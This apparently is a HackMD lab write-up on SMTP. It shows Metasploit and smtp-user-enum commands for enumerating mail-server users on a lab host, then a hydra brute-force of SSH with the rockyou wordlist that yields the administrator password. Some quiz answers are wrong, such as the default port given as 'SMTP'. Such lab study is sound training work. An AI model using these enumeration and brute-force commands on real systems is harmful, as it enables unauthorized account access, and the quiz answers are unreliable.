SMTP - HackMD

# SMTP ###### tags: `network` `service` Simple Mail Transfer Protocol # Working ![](https://i.imgur.com/i9mJK8Z.png) ## Protocol - SMTP Ultimately end - POP (post office protocol) - IMAP (internet message access protocol) SMTP + Protocol -> Allow the user to send outgoing mail and retrieve incoming mail, respectively. # Enumerate ## server detail ### Metasploit "_smtp_version_" module it will scan a range of IP addresses and determine the version of any mail servers it encounters. ![](https://i.imgur.com/2vly1Hp.png) MTA-> Postfix MTAtoMTA Postfix (ESMTP) 是一個免費開源的電子郵件伺服器軟體， ESMTP 是一种协议，用于更高效和安全地发送邮件，而 Postfix 是一个实现这种协议的邮件服务器软件。 ## User from SMTP ### Manual stmp command (connected by using the telnet) -> VRFY (confirming the names of valid users) -> EXPN (mailing lists) show uses maill address and e-mail ## Using Metasploit "_smtp_enum_" module ![](https://i.imgur.com/l63SdYE.png) ``` 10.10.57.11:25 Users found: , _apt, administrator, backup, bin, daemon, dnsmasq, games, gnats, irc, landscape, list, lp, lxd, mail, man, messagebus, news, nobody, pollinate, postfix, postmaster, proxy, sshd, sync, sys, syslog, systemd-network, systemd-resolve, systemd-timesync, uucp, uuidd, www-data ``` ``` echo "10.10.57.11:25 Users found: , _apt, administrator, backup, bin, daemon, dnsmasq, games, gnats, irc, landscape, list, lp, lxd, mail, man, messagebus, news, nobody, pollinate, postfix, postmaster, proxy, sshd, sync, sys, syslog, systemd-network, systemd-resolve, systemd-timesync, uucp, uuidd, www-data" | tr ',' '\n' >> mailUser ``` ``` 10.10.57.11:25 Users found: _apt administrator backup bin daemon dnsmasq games gnats irc landscape list lp lxd mail man messagebus news nobody pollinate postfix postmaster proxy sshd sync sys syslog systemd-network systemd-resolve systemd-timesync uucp uuidd www-data ``` ## Alternate tools ``` smtp-user-enum ``` https://www.kali.org/tools/smtp-user-enum/ ``` Examples: $ smtp-user-enum -M VRFY -U users.txt -t 10.0.0.1 $ smtp-user-enum -M EXPN -u admin1 -t 10.0.0.1 $ smtp-user-enum -M RCPT -U users.txt -T mail-server-ips.txt $ smtp-user-enum -M EXPN -D example.com -U users.txt -t 10.0.0.1 ``` # Exploit info username: administrator password ? port 22 is open Try login by using hydra ``` hydra -t 16 -l administrator -f -P ../../../wordlists/rockyou.txt -vV 10.10.57.11 ssh ``` ![](https://i.imgur.com/sOktZzQ.png) Password: alejandro ![](https://i.imgur.com/5a7Eu5C.png) login Success --- Question What is the first step in the SMTP process? SMTP handshake --- What is the default SMTP port? SMTP --- Where does the SMTP server send the email if the recipient's server is not available? SMTP queue --- On what server does the Email ultimately end up on? POP/IMAP ---- # Reference https://computer.howstuffworks.com/e-mail-messaging/email3.htm